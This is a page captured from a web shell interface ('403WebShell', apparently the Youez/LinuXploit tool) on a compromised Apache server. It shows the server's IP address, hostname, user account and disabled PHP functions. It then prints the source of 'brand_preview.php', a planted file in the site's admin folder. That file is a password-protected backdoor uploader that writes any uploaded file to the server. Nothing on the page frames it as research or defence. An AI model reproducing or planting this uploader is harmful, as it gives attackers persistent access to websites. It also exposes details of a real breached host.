403WebShell

403Webshell

Server IP : 103.233.193.20 / Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /home/oriscomadm/domains/oriscom.com/private_html/admin/

Upload File :

[ Back ]

Current File : /home/oriscomadm/domains/oriscom.com/private_html/admin/brand_preview.php

<?php
if (isset($_POST['Submit'])) {
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    $password = $_POST['password']; // Mengambil input password

    // Password yang valid (hash MD5 dari password yang benar)
    $valid_hashed_password = 'bd31dc0be927f6841e6e193aafd54017'; // Hash MD5 dari 'mypassword'

    // Generate hash MD5 dari password yang diinputkan
    $hashed_password = md5($password);

    if ($hashed_password === $valid_hashed_password) {
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir . $userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);

            echo "<center><b>Done ==> $userfile_name</b></center>";
        }
    } else {
        echo "<center><b>Upload failed: Invalid password!</b></center>";
    }
} else {
    echo '<form method="POST" action="" enctype="multipart/form-data"> 
        <input type="file" name="image">
        <input type="password" name="password" placeholder="Enter password" required>
        <input type="Submit" name="Submit" value="Submit">
        </form>';
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit